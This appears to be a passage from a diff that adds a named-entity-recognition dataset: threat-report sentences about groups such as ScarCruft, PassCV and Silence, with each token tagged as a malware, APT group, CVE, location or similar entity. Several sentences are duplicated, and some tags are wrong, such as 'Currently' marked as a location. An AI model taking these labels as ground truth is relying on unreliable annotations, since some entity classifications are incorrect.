+and O
+military B-IDTY
+entities E-IDTY
+and O
+one O
+of O
+the O
+major O
+Ukrainian O
+news B-IDTY
+agencies E-IDTY
+. O
+
+As O
+confirmation O
+that O
+the O
+malware O
+writers O
+are O
+still O
+very O
+active O
+even O
+at O
+the O
+time O
+of O
+this O
+writing O
+, O
+ESET S-SECTEAM
+detected O
+a O
+new O
+Potao B-MAL
+sample E-MAL
+compiled O
+on O
+July B-TIME
+20 E-TIME
+, O
+2015 S-TIME
+. O
+
+In O
+the O
+previous O
+pages O
+we O
+have O
+presented O
+our O
+findings O
+based O
+on O
+ESET S-SECTEAM
+detection O
+telemetry O
+and O
+our O
+analysis O
+of O
+Win32/Potao S-MAL
+and O
+Win32/FakeTC B-MAL
+samples E-MAL
+. O
+
+Potao S-MAL
+is O
+another O
+example O
+of O
+targeted O
+espionage O
+malware O
+, O
+a O
+so-called O
+APT O
+, O
+to O
+use O
+the O
+popular O
+buzzword O
+, O
+although O
+technically O
+the O
+malware S-MAL
+is O
+not O
+particularly O
+advanced O
+or O
+sophisticated O
+. O
+
+Examples O
+of O
+notable O
+Potao S-MAL
+dissemination O
+techniques O
+, O
+some O
+of O
+which O
+were O
+previously O
+unseen O
+, O
+or O
+at O
+least O
+relatively O
+uncommon O
+, O
+include O
+the O
+use O
+of O
+highly-targeted O
+spear-phishing S-ACT
+SMS O
+messages O
+to O
+drive O
+potential O
+victims O
+to O
+malware O
+download O
+sites O
+and O
+USB O
+worm O
+functionality O
+that O
+tricked O
+the O
+user O
+into O
+' O
+willingly O
+' O
+executing O
+the O
+Trojan S-MAL
+. O
+
+The O
+PassCV B-APT
+group E-APT
+continues O
+to O
+be O
+one O
+of O
+the O
+most O
+successful O
+and O
+active O
+threat O
+groups O
+that O
+leverage O
+a O
+wide O
+array O
+of O
+stolen O
+Authenticode-signing O
+certificates O
+. O
+
+The O
+PassCV B-APT
+group E-APT
+typically O
+utilized O
+publicly O
+available O
+RATs S-MAL
+in O
+addition O
+to O
+some O
+custom O
+code O
+, O
+which O
+ultimately O
+provided O
+backdoor O
+functionality O
+to O
+affected O
+systems O
+via O
+phony O
+resumes O
+and O
+curriculum O
+vitae O
+( O
+CVs O
+) O
+. O
+
+he O
+PassCV S-APT
+group O
+typically O
+utilized O
+publicly O
+available O
+RATs S-MAL
+in O
+addition O
+to O
+some O
+custom O
+code O
+, O
+which O
+ultimately O
+provided O
+backdoor O
+functionality O
+to O
+affected O
+systems O
+via O
+phony O
+resumes O
+and O
+curriculum O
+vitae O
+( O
+CVs O
+) O
+. O
+
+PassCV S-APT
+continues O
+to O
+maintain O
+a O
+heavy O
+reliance O
+on O
+obfuscated O
+and O
+signed O
+versions O
+of O
+older O
+RATs S-MAL
+like O
+ZxShell S-MAL
+and O
+Ghost B-MAL
+RAT E-MAL
+, O
+which O
+have O
+remained O
+a O
+favorite O
+of O
+the O
+wider O
+Chinese O
+criminal O
+community O
+since O
+their O
+initial O
+public O
+release O
+. O
+
+SPEAR S-SECTEAM
+identified O
+recent O
+PassCV B-MAL
+samples E-MAL
+which O
+implemented O
+another O
+commercial O
+off-the-shelf O
+( O
+COTS O
+) O
+RAT S-MAL
+called O
+Netwire S-MAL
+. O
+
+SPEAR S-SECTEAM
+identified O
+recent O
+PassCV B-MAL
+samples E-MAL
+which O
+implemented O
+another O
+commercial O
+off-the-shelf O
+( O
+COTS O
+) O
+RAT S-MAL
+called O
+Netwire S-MAL
+. O
+
+The O
+first O
+new O
+connection O
+SPEAR S-SECTEAM
+identified O
+was O
+derived O
+from O
+an O
+email S-TOOL
+address O
+listed O
+in O
+Blue O
+Coat O
+Systems' O
+original O
+report O
+on O
+PassCV S-APT
+. O
+
+Syncopate O
+is O
+a O
+well-known O
+Russian O
+company S-IDTY
+that O
+is O
+best O
+known O
+as O
+the O
+developer O
+and O
+operator O
+of O
+the O
+' O
+GameNet O
+' O
+platform O
+. O
+
+The O
+PassCV S-APT
+group O
+continues O
+to O
+be O
+extremely O
+effective O
+in O
+compromising O
+both O
+small O
+and O
+large O
+game B-IDTY
+companies E-IDTY
+and O
+surreptitiously O
+using O
+their O
+code-signing O
+certificates O
+to O
+infect O
+an O
+even O
+larger O
+swath O
+of O
+organizations O
+. O
+
+Since O
+the O
+last O
+report O
+, O
+PassCV S-APT
+has O
+significantly O
+expanded O
+its O
+targets O
+to O
+include O
+victims O
+in O
+the O
+United B-LOC
+States E-LOC
+, O
+Taiwan S-LOC
+, O
+China S-LOC
+and O
+Russia S-LOC
+. O
+
+Based O
+on O
+data O
+collected O
+from O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks I-SECTEAM
+AutoFocus E-SECTEAM
+threat O
+intelligence O
+, O
+we O
+discovered O
+continued O
+operations O
+of O
+activity O
+very O
+similar O
+to O
+the O
+Roaming B-ACT
+Tiger I-ACT
+attack I-ACT
+campaign E-ACT
+that O
+began O
+in O
+the O
+August S-TIME
+2015 S-TIME
+timeframe O
+, O
+with O
+a O
+concentration O
+of O
+attacks O
+in O
+late O
+October S-TIME
+and O
+continuing O
+into O
+December O
+. O
+
+The O
+files S-FILE
+exploit S-VULNAME
+the O
+well-known O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+, O
+CVE-2012-0158 S-VULID
+, O
+to O
+execute O
+malicious O
+code O
+in O
+order O
+to O
+take O
+control O
+of O
+the O
+targeted O
+systems O
+. O
+
+BBSRAT S-MAL
+is O
+typically O
+packaged O
+within O
+a O
+portable B-ACT
+executable I-ACT
+file E-ACT
+, O
+although O
+in O
+a O
+few O
+of O
+the O
+observed O
+instances O
+, O
+a O
+raw O
+DLL S-TOOL
+was O
+discovered O
+to O
+contain O
+BBSRAT S-MAL
+. O
+
+WildFire S-SECTEAM
+properly O
+classifies O
+BBSRAT B-MAL
+malware I-MAL
+samples E-MAL
+as O
+malicious O
+. O
+
+This O
+week O
+we O
+will O
+discuss O
+another O
+Chinese S-LOC
+nexus O
+adversary O
+we O
+call O
+Samurai O
+Panda O
+. O
+
+Samurai B-APT
+Panda E-APT
+is O
+interesting O
+in O
+that O
+their O
+target O
+selection O
+tends O
+to O
+focus O
+on O
+Asia B-LOC
+Pacific E-LOC
+victims O
+in O
+Japan S-LOC
+, O
+the O
+Republic B-LOC
+of I-LOC
+Korea E-LOC
+, O
+and O
+other O
+democratic O
+Asian S-LOC
+victims O
+. O
+
+Next O
+, O
+in O
+an O
+effort O
+to O
+demonstrate O
+it O
+wasn't O
+relegated O
+to O
+China O
+, O
+CrowdStrike S-SECTEAM
+exposed O
+Clever O
+Kitten O
+, O
+an O
+actor O
+we O
+track O
+out O
+of O
+Iran S-LOC
+who O
+leverages O
+some O
+very O
+distinct O
+TTPs O
+when O
+viewed O
+next O
+to O
+a O
+more O
+visible O
+adversary O
+. O
+
+Next O
+, O
+in O
+an O
+effort O
+to O
+demonstrate O
+it O
+wasn't O
+relegated O
+to O
+China O
+, O
+we O
+exposed O
+Clever O
+Kitten O
+, O
+an O
+actor O
+we O
+track O
+out O
+of O
+Iran S-LOC
+who O
+leverages O
+some O
+very O
+distinct O
+TTPs O
+when O
+viewed O
+next O
+to O
+a O
+more O
+visible O
+adversary O
+. O
+
+Beginning O
+in O
+2009 S-TIME
+, O
+we've O
+observed O
+this O
+actor O
+conduct O
+more O
+than O
+40 O
+unique O
+campaigns S-ACT
+that O
+we've O
+identified O
+in O
+the O
+malware O
+configurations' O
+campaign O
+codes O
+. O
+
+These O
+codes O
+are O
+often O
+leveraged O
+in O
+the O
+malware O
+used O
+by O
+coordinated O
+targeted O
+attackers O
+to O
+differentiate O
+victims O
+that O
+were O
+successfully O
+compromised O
+from O
+different O
+target O
+sets O
+. O
+
+When O
+conducting O
+programmatic O
+espionage B-ACT
+activity E-ACT
+, O
+it O
+can O
+presumably O
+become O
+quite O
+confusing O
+if O
+the O
+attacker O
+targets O
+a O
+heavy B-IDTY
+industry I-IDTY
+company E-IDTY
+, O
+an O
+avionics O
+program O
+, O
+and O
+seven O
+other O
+unique O
+targets O
+as O
+to O
+which O
+infected O
+host O
+you O
+will O
+collect O
+what O
+information O
+from O
+. O
+
+These O
+rules O
+detect O
+the O
+malware O
+" O
+beaconing S-MAL
+" O
+to O
+the O
+command-and-control B-MAL
+server E-MAL
+, O
+the O
+initial O
+malware O
+check-in O
+, O
+and O
+an O
+attempt O
+to O
+download O
+a O
+backdoor O
+module O
+. O
+
+Earlier O
+this O
+month O
+, O
+Securelist S-SECTEAM
+'s O
+technology O
+caught O
+another O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploits O
+deployed O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+Securelist S-APT
+believe O
+the O
+attacks O
+are O
+launched O
+by O
+an O
+APT O
+Group O
+we O
+track O
+under O
+the O
+codename O
+" O
+ScarCruft S-APT
+" O
+. O
+
+ScarCruft S-APT
+is O
+a O
+relatively O
+new O
+APT O
+group O
+; O
+victims O
+have O
+been O
+observed O
+in O
+Russia S-LOC
+, O
+Nepal S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+China S-LOC
+, O
+India S-LOC
+, O
+Kuwait S-LOC
+and O
+Romania S-LOC
+. O
+
+ScarCruft S-APT
+has O
+several O
+ongoing O
+operations O
+, O
+utilizing O
+multiple O
+exploits O
+— O
+two O
+for O
+Adobe B-MAL
+Flash E-MAL
+and O
+one O
+for O
+Microsoft B-MAL
+Internet I-MAL
+Explorer E-MAL
+. O
+
+ScarCruft S-APT
+is O
+a O
+relatively O
+new O
+APT O
+group O
+; O
+victims O
+have O
+been O
+observed O
+in O
+Russia S-LOC
+, O
+Nepal S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+China S-LOC
+, O
+India S-LOC
+, O
+Kuwait S-LOC
+and O
+Romania S-LOC
+. O
+
+Operation B-ACT
+Daybreak E-ACT
+appears O
+to O
+have O
+been O
+launched O
+by O
+ScarCruft O
+in O
+March B-TIME
+2016 E-TIME
+and O
+employs O
+a O
+previously O
+unknown O
+( O
+0-day S-VULNAME
+) O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+It O
+is O
+also O
+possible O
+that O
+ScarCruft S-APT
+deployed O
+another O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+, O
+CVE-2016-0147 S-VULID
+, O
+which O
+was O
+patched O
+in O
+April O
+. O
+
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+( O
+CVE-2016-4117 S-VULID
+) O
+through O
+the O
+use O
+of O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+ScarCruft S-APT
+'s O
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+( O
+CVE-2016-4117 S-VULID
+) O
+through O
+the O
+use O
+of O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+Nevertheless O
+, O
+resourceful O
+threat O
+actors O
+such O
+as O
+ScarCruft S-APT
+will O
+probably O
+continue O
+to O
+deploy O
+zero-day S-VULNAME
+exploits O
+against O
+their O
+high O
+profile O
+targets O
+. O
+
+After O
+publishing O
+our O
+initial O
+series O
+of O
+blogposts O
+back O
+in O
+2016 S-TIME
+, O
+Kaspersky S-SECTEAM
+have O
+continued O
+to O
+track O
+the O
+ScarCruft S-APT
+threat O
+actor O
+. O
+
+After O
+publishing O
+our O
+initial O
+series O
+of O
+blogposts O
+back O
+in O
+2016 S-TIME
+, O
+we O
+have O
+continued O
+to O
+track O
+the O
+ScarCruft O
+threat O
+actor O
+. O
+
+ScarCruft S-APT
+is O
+a O
+Korean-speaking S-LOC
+and O
+allegedly O
+state-sponsored O
+threat O
+actor O
+that O
+usually O
+targets O
+organizations O
+and O
+companies O
+with O
+links O
+to O
+the O
+Korean B-LOC
+peninsula E-LOC
+. O
+
+The O
+ScarCruft B-APT
+group E-APT
+uses O
+common O
+malware O
+delivery O
+techniques O
+such O
+as O
+spear B-ACT
+phishing E-ACT
+and O
+Strategic B-ACT
+Web I-ACT
+Compromises E-ACT
+( O
+SWC S-ACT
+) O
+. O
+
+ScarCruft S-APT
+is O
+a O
+Korean-speaking O
+and O
+allegedly O
+state-sponsored O
+threat O
+actor O
+that O
+usually O
+targets O
+organizations O
+and O
+companies O
+with O
+links O
+to O
+the O
+Korean S-LOC
+peninsula O
+. O
+
+ScarCruft S-APT
+uses O
+a O
+multi-stage O
+binary B-ACT
+infection I-ACT
+scheme E-ACT
+. O
+
+One O
+of O
+the O
+most O
+notable O
+functions O
+of O
+the O
+initial O
+dropper S-MAL
+is O
+to O
+bypass O
+Windows S-OS
+UAC O
+( O
+User O
+Account O
+Control O
+) O
+in O
+order O
+to O
+execute O
+the O
+next O
+payload O
+with O
+higher O
+privileges O
+. O
+
+This O
+malware O
+uses O
+the O
+public O
+privilege O
+escalation O
+exploit S-VULNAME
+code O
+CVE-2018-8120 S-VULID
+or O
+UACME S-MAL
+which O
+is O
+normally O
+used O
+by O
+legitimate O
+red O
+teams O
+. O
+
+Afterwards O
+, O
+the O
+installer O
+malware O
+creates O
+a O
+downloader O
+and O
+a O
+configuration O
+file O
+from O
+its O
+resource O
+and O
+executes O
+it O
+. O
+
+The O
+downloader S-MAL
+malware S-MAL
+uses O
+the O
+configuration O
+file O
+and O
+connects O
+to O
+the O
+C2 S-TOOL
+server O
+to O
+fetch O
+the O
+next O
+payload O
+. O
+
+The O
+ScarCruft S-APT
+group O
+keeps O
+expanding O
+its O
+Exfiltration S-ACT
+targets O
+to O
+steal O
+further O
+information O
+from O
+infected O
+hosts O
+and O
+continues O
+to O
+create O
+tools O
+for O
+additional O
+data O
+Exfiltration S-ACT
+. O
+
+We O
+also O
+discovered O
+an O
+interesting O
+piece O
+of O
+rare O
+malware S-MAL
+created O
+by O
+this O
+threat O
+actor O
+– O
+a O
+Bluetooth B-FILE
+device I-FILE
+harvester E-FILE
+. O
+
+We O
+believe O
+they O
+may O
+have O
+some O
+links O
+to O
+North O
+Korea O
+, O
+which O
+may O
+explain O
+why O
+ScarCruft O
+decided O
+to O
+closely O
+monitor O
+them O
+. O
+
+ScarCruft O
+also O
+attacked O
+a O
+diplomatic B-IDTY
+agency E-IDTY
+in O
+Hong S-LOC
+Kong S-LOC
+, O
+and O
+another O
+diplomatic B-IDTY
+agency E-IDTY
+in O
+North B-LOC
+Korea E-LOC
+. O
+
+It O
+appears O
+ScarCruft S-APT
+is O
+primarily O
+targeting O
+intelligence S-IDTY
+for O
+political S-IDTY
+and O
+diplomatic S-IDTY
+purposes O
+. O
+
+ScarCruft S-APT
+infected O
+this O
+victim O
+on O
+September B-TIME
+21 E-TIME
+, O
+2018 S-TIME
+. O
+
+But O
+before O
+the O
+ScarCruft S-APT
+infection O
+, O
+however O
+, O
+another O
+APT O
+group O
+also O
+targeted O
+this O
+victim O
+with O
+the O
+host O
+being O
+infected O
+with O
+GreezeBackdoor O
+on O
+March B-TIME
+26 E-TIME
+, O
+2018 S-TIME
+. O
+
+ScarCruft S-APT
+has O
+a O
+keen O
+interest O
+in O
+North B-LOC
+Korean E-LOC
+affairs O
+, O
+attacking O
+those O
+in O
+the O
+business B-IDTY
+sector E-IDTY
+who O
+may O
+have O
+any O
+connection O
+to O
+North B-LOC
+Korea E-LOC
+, O
+as O
+well O
+as O
+diplomatic B-IDTY
+agencies E-IDTY
+around O
+the O
+globe O
+. O
+
+Earlier O
+this O
+month O
+, O
+we O
+caught O
+another O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploits O
+deployed O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+ScarCruft S-APT
+is O
+a O
+relatively O
+new O
+APT O
+group O
+; O
+victims O
+have O
+been O
+observed O
+in O
+several O
+countries O
+, O
+including O
+Russia S-LOC
+, O
+Nepal S-LOC
+, O
+South S-LOC
+Korea S-LOC
+, O
+China S-LOC
+, O
+India S-LOC
+, O
+Kuwait S-LOC
+and O
+Romania S-LOC
+. O
+
+Currently S-LOC
+, O
+the O
+group O
+is O
+engaged O
+in O
+two O
+major O
+operations O
+: O
+Operation B-ACT
+Daybreak E-ACT
+and O
+Operation B-ACT
+Erebus E-ACT
+. O
+
+The O
+other O
+one O
+, O
+ScarCruft O
+'s O
+Operation B-ACT
+Erebus E-ACT
+employs O
+an O
+older O
+exploit S-VULNAME
+, O
+for O
+CVE-2016-4117 S-VULID
+and O
+leverages O
+watering B-ACT
+holes E-ACT
+. O
+
+The O
+other O
+one O
+, O
+" O
+Operation B-ACT
+Erebus E-ACT
+" O
+employs O
+an O
+older O
+exploit S-VULNAME
+, O
+for O
+CVE-2016-4117 S-VULID
+and O
+leverages O
+watering B-ACT
+holes E-ACT
+. O
+
+We O
+will O
+publish O
+more O
+details O
+about O
+the O
+attack O
+once O
+Adobe O
+patches O
+the O
+vulnerability O
+, O
+which O
+should O
+be O
+on O
+June B-TIME
+16 E-TIME
+. O
+
+The O
+ScarCruft O
+APT O
+gang O
+has O
+made O
+use O
+of O
+a O
+Flash S-TOOL
+zero B-VULNAME
+day E-VULNAME
+patched O
+Thursday O
+by O
+Adobe O
+to O
+attack O
+more O
+than O
+two O
+dozen O
+high-profile O
+targets O
+in O
+Russia S-LOC
+and O
+Asia S-LOC
+primarily O
+. O
+
+Adobe O
+on O
+Thursday O
+patched O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Flash S-TOOL
+Player O
+that O
+has O
+been O
+used O
+in O
+targeted B-ACT
+attacks E-ACT
+carried O
+out O
+by O
+a O
+new O
+APT O
+group O
+operating O
+primarily O
+against O
+high-profile O
+victims O
+in O
+Russia S-LOC
+and O
+Asia S-LOC
+. O
+
+Researchers O
+at O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+privately O
+disclosed O
+the O
+flaw O
+to O
+Adobe O
+after O
+exploits O
+against O
+the O
+zero-day S-VULNAME
+were O
+used O
+in O
+March S-TIME
+by O
+the O
+ScarCruft O
+APT O
+gang O
+in O
+what O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+is O
+calling O
+Operation B-ACT
+Daybreak E-ACT
+. O
+
+Kaspersky S-SECTEAM
+speculates O
+that O
+ScarCruft S-APT
+could O
+also O
+be O
+behind O
+another O
+zero-day S-VULNAME
+, O
+CVE-2016-0147 S-VULID
+, O
+a O
+vulnerability O
+in O
+Microsoft S-IDTY
+XML S-TOOL
+Core O
+Services O
+that O
+was O
+patched O
+in O
+April S-TIME
+. O
+
+attacks O
+start O
+with O
+spear-phishing S-ACT
+emails S-TOOL
+that O
+include O
+a O
+link O
+to O
+a O
+website O
+hosting O
+an O
+exploit S-VULNAME
+kit O
+associated O
+with O
+ScarCruft S-APT
+and O
+used O
+in O
+other O
+attacks O
+. O
+
+Another O
+set O
+of O
+attacks O
+called O
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+flash S-TOOL
+exploit S-VULNAME
+, O
+CVE-2016-4117 S-VULID
+, O
+and O
+relies O
+on O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+as O
+a O
+means O
+of O
+propagation O
+. O
+
+Thursday O
+'s O
+Flash S-TOOL
+Player O
+update O
+patched O
+36 O
+vulnerabilities O
+in O
+total O
+including O
+the O
+zero B-VULNAME
+day E-VULNAME
+CVE-2016-4171 S-VULID
+. O
+
+The O
+ongoing O
+operation O
+likely O
+began O
+as O
+early O
+as O
+January B-TIME
+2017 E-TIME
+and O
+has O
+continued O
+through O
+the O
+first O
+quarter O
+of O
+2019 S-TIME
+. O
+
+Cisco B-SECTEAM
+Talos E-SECTEAM
+assess O
+with O
+high O
+confidence O
+that O
+these O
+operations O
+are O
+distinctly O
+different O
+and O
+independent O
+from O
+the O
+operations O
+performed O
+by O
+DNSpionage S-ACT
+, O
+which O
+we O
+reported O
+on O
+in O
+November B-TIME
+2018 E-TIME
+. O
+
+We O
+assess O
+with O
+high O
+confidence O
+that O
+these O
+operations O
+are O
+distinctly O
+different O
+and O
+independent O
+from O
+the O
+operations O
+performed O
+by O
+DNSpionage S-ACT
+, O
+which O
+we O
+reported O
+on O
+in O
+November B-TIME
+2018 E-TIME
+. O
+
+The O
+common O
+use O
+of O
+the O
+Enfal B-MAL
+Trojan E-MAL
+suggests O
+that O
+Shadow O
+Network O
+may O
+be O
+exchanging O
+tools O
+and O
+techniques O
+. O
+
+While B-APT
+Silence E-APT
+had O
+previously O
+targeted O
+Russian S-LOC
+banks S-IDTY
+, O
+Group-IB S-SECTEAM
+experts O
+also O
+have O
+discovered O
+evidence O
+of O
+the O
+group O
+'s O
+activity O
+in O
+more O
+than O
+25 O
+countries O
+worldwide O
+. O
+
+In O
+August B-TIME
+2017 E-TIME
+, O
+the O
+National B-IDTY
+Bank E-IDTY
+of O
+Ukraine S-LOC
+warned O
+state-owned O
+and O
+private B-IDTY
+banks E-IDTY
+across O
+the O
+country O
+about O
+a O
+large-scale O
+phishing B-ACT
+attack E-ACT
+. O
+
+The O
+threat O
+actor O
+used O
+an O
+exploit S-VULNAME
+from O
+the O
+arsenal O
+of O
+the O
+state-sponsored O
+hacker O
+group O
+APT28 S-APT
+. O
+
+The O
+new O
+threat O
+actor O
+group O
+was O
+eventually O
+named O
+Silence O
+. O
+
+Silence O
+is O
+a O
+group O
+of O
+Russian-speaking S-LOC
+hackers O
+, O
+based O
+on O
+their O
+commands O
+language O
+, O
+the O
+location O
+of O
+infrastructure O
+they O
+used O
+, O
+and O
+the O
+geography O
+of O
+their O
+targets O
+( O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+Belarus S-LOC
+, O
+Azerbaijan S-LOC
+, O
+Poland S-LOC
+, O
+and O
+Kazakhstan S-LOC
+) O
+. O
+
+Although O
+Silence O
+'s O
+phishing B-ACT
+emails S-TOOL
+were O
+also O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+Central B-LOC
+and I-LOC
+Western I-LOC
+Europe E-LOC
+, O
+Africa S-LOC
+, O
+and O
+Asia S-LOC
+) O
+. O
+
+Silence O
+also O
+used O
+Russian-language S-LOC
+web B-MAL
+hosting I-MAL
+services E-MAL
+. O
+
+Financially O
+motivated O
+APT O
+groups O
+which O
+focus O
+efforts O
+on O
+targeted B-ACT
+attacks E-ACT
+on O
+the O
+financial B-IDTY
+sector E-IDTY
+such O
+as O
+— O
+Anunak O
+, O
+Corkow S-MAL
+, O
+Buhtrap O
+— O
+usually O
+managed O
+botnets O
+using O
+developed O
+or O
+modified O
+banking S-IDTY
+Trojans O
+. O
+
+They O
+tried O
+new O
+techniques O
+to O
+steal O
+from O
+banking O
+systems O
+, O
+including O
+AWS O
+CBR O
+( O
+the O
+Russian S-LOC
+Central B-IDTY
+Bank I-IDTY
+'s I-IDTY
+Automated I-IDTY
+Workstation I-IDTY
+Client E-IDTY
+) O
+, O
+ATMs S-IDTY
+, O
+and O
+card O
+processing O
+. O
+
+Group-IB S-SECTEAM
+researchers O
+were O
+tracking O
+Silence O
+throughout O
+this O
+period O
+and O
+conducting O
+response O
+following O
+incidents O
+in O
+the O
+financial B-IDTY
+sector E-IDTY
+. O
+
+Group-IB S-SECTEAM
+detected O
+the O
+first O
+incidents O
+relating O
+to O
+Silence O
+in O
+June B-TIME
+2016 E-TIME
+. O
+
+One O
+of O
+Silence O
+'s O
+first O
+targets O
+was O
+a O
+Russian S-LOC
+bank S-IDTY
+, O
+when O
+they O
+tried O
+to O
+attack O
+AWS O
+CBR O
+. O
+
+They O
+are O
+selective O
+in O
+their O
+attacks O
+and O
+wait O
+for O
+about O
+three O
+months O
+between O
+incidents O
+, O
+which O
+is O
+approximately O
+three O
+times O
+longer O
+than O
+other O
+financially O
+motivated O
+APT O
+groups O
+, O
+like O
+MoneyTaker O
+, O
+Anunak O
+( O
+Carbanak O
+) O
+, O
+Buhtrap O
+or O
+Cobalt O
+. O
+
+Silence O
+try O
+to O
+apply O
+new O
+techniques O
+and O
+ACTs O
+of O
+stealing O
+from O
+various O
+banking O
+systems O
+, O
+including O
+AWS O
+CBR O
+, O
+ATMs O
+, O
+and O
+card O
+processing O
+. O
+
+Silence O
+'s O
+successful O
+attacks O
+currently O
+have O
+been O
+limited O
+to O
+the O
+CIS O
+and O
+Eastern O
+European O
+countries O
+. O
+
+He O
+is O
+responsible O
+for O
+developing O
+tools O
+for O
+conducting O
+attacks O
+and O
+is O
+also O
+able O
+to O
+modify O
+complex O
+exploits O
+and O
+third O
+party O
+software O
+. O
+
+Silence O
+'s O
+main O
+targets O
+are O
+located O
+in O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+Belarus S-LOC
+, O
+Azerbaijan S-LOC
+, O
+Poland S-LOC
+, O
+and O
+Kazakhstan S-LOC
+. O
+
+However O
+, O
+some O
+phishing B-ACT
+emails S-TOOL
+were O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+more O
+than O
+25 O
+countries O
+of O
+Central S-LOC
+and O
+Western S-LOC
+Europe S-LOC
+, O
+Africa S-LOC
+and O
+Asia S-LOC
+including O
+: O
+Kyrgyzstan S-LOC
+, O
+Armenia S-LOC
+, O
+Georgia S-LOC
+, O
+Serbia S-LOC
+, O
+Germany S-LOC
+, O
+Latvia S-LOC
+, O
+Czech B-LOC
+Republic E-LOC
+, O
+Romania S-LOC
+, O
+Kenya S-LOC
+, O
+Israel S-LOC
+, O
+Cyprus S-LOC
+, O
+Greece S-LOC
+, O
+Turkey S-LOC
+, O
+Taiwan S-LOC
+, O
+Malaysia S-LOC
+, O
+Switzerland S-LOC
+, O
+Vietnam S-LOC
+, O
+Austria S-LOC
+, O
+Uzbekistan S-LOC
+, O
+Great B-LOC
+Britain E-LOC
+, O
+Hong B-LOC
+Kong E-LOC
+, O
+and O
+others O
+. O
+
+In O
+the O
+same O
+year O
+, O
+they O
+conducted O
+DDoS B-ACT
+attacks E-ACT
+using O
+the O
+Perl B-MAL
+IRC I-MAL
+bot E-MAL
+and O
+public B-MAL
+IRC I-MAL
+chats E-MAL
+to O
+control O
+Trojans O
+. O
+
+In O
+the O
+same O
+year O
+, O
+Silence O
+conducted O
+DDoS B-ACT
+attacks E-ACT
+using O
+the O
+Perl B-MAL
+IRC I-MAL
+bot E-MAL
+and O
+public B-MAL
+IRC I-MAL
+chats E-MAL
+to O
+control O
+Trojans O
+. O
+
+In O
+two O
+months O
+, O
+the O
+group O
+returned O
+to O
+their O
+proven O
+method O
+and O
+withdrew O
+funds O
+again O
+through O
+ATMs O
+. O
+
+In O
+September B-TIME
+2017 E-TIME
+, O
+we O
+discovered O
+a O
+new O
+targeted B-ACT
+attack E-ACT
+on O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+In O
+September B-TIME
+2017 E-TIME
+, O
+we O
+discovered O
+Silence B-ACT
+attack E-ACT
+on O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+The O
+infection O
+vector O
+is O
+a O
+spear-phishing S-ACT
+email E-ACT
+with O
+a O
+malicious O
+attachment O
+. O
+
+An O
+interesting O
+point O
+in O
+the O
+Silence B-ACT
+attack E-ACT
+is O
+that O
+the O
+cybercriminals O
+had O
+already O
+compromised O
+banking S-IDTY
+infrastructure O
+in O
+order O
+to O
+send O
+their O
+spear-phishing S-ACT
+emails S-TOOL
+from O
+the O
+addresses O
+of O
+real O
+bank B-IDTY
+employees E-IDTY
+and O
+look O
+as O
+unsuspicious O
+as O
+possible O
+to O
+future O
+victims O
+. O
+
+The O
+spear-phishing S-ACT
+infection O
+vector O
+is O
+still O
+the O
+most O
+popular O
+ACT O
+to O
+initiate O
+targeted O
+campaigns S-ACT
+. O
+
+We O
+conclude O
+that O
+the O
+actor O
+behind O
+the O
+attack O
+is O
+Silence O
+group O
+, O
+a O
+relatively O
+new O
+threat O
+actor O
+that's O
+been O
+operating O
+since O
+mid-2016 S-TIME
+. O
+
+A O
+preliminary O
+analysis O
+caught O
+the O
+attention O
+of O
+our O
+Threat O
+Analysis O
+and O
+Intelligence O
+team O
+as O
+it O
+yielded O
+interesting O
+data O
+that O
+, O
+among O
+other O
+things O
+, O
+shows O
+that O
+Silence O
+was O
+targeting O
+employees S-IDTY
+from O
+financial B-IDTY
+entities E-IDTY
+, O
+specifically O
+in O
+the O
+Russian B-LOC
+Federation E-LOC
+and O
+the O
+Republic B-LOC
+of I-LOC
+Belarus E-LOC
+. O
+
+As O
+shown O
+above O
+, O
+the O
+threat O
+runs O
+several O
+native B-MAL
+binaries E-MAL
+to O
+collect O
+useful O
+information O
+for O
+its O
+recon O
+phase O
+. O
+
+The O
+intelligence O
+we O
+have O
+collected O
+shows O
+that O
+Silence O
+is O
+part O
+of O
+a O
+more O
+extensive O
+operation O
+, O
+still O
+focused O
+on O
+financial B-IDTY
+institutions E-IDTY
+operating O
+mainly O
+on O
+Russian O
+territory O
+. O
+
+These O
+spearphishing S-ACT
+attempts O
+represent O
+an O
+evolution O
+of O
+Iranian O
+actors O
+based O
+on O
+their O
+social B-ACT
+engineering I-ACT
+tactics E-ACT
+and O
+narrow O
+targeting O
+. O
+
+Based O
+on O
+file O
+modification O
+dates O
+and O
+timestamps O
+of O
+samples O
+, O
+it O
+appears O
+that O
+the O
+observed O
+campaign O
+was O
+initiated O
+in O
+the O
+middle O
+of O
+February B-TIME
+2016 E-TIME
+, O
+with O
+the O
+infrastructure O
+taken O
+offline O
+at O
+the O
+start O
+of O
+March S-TIME
+. O
+
+While O
+the O
+Sima O
+moniker O
+could O
+similarly O
+originate O
+from O
+software O
+labels O
+, O
+it O
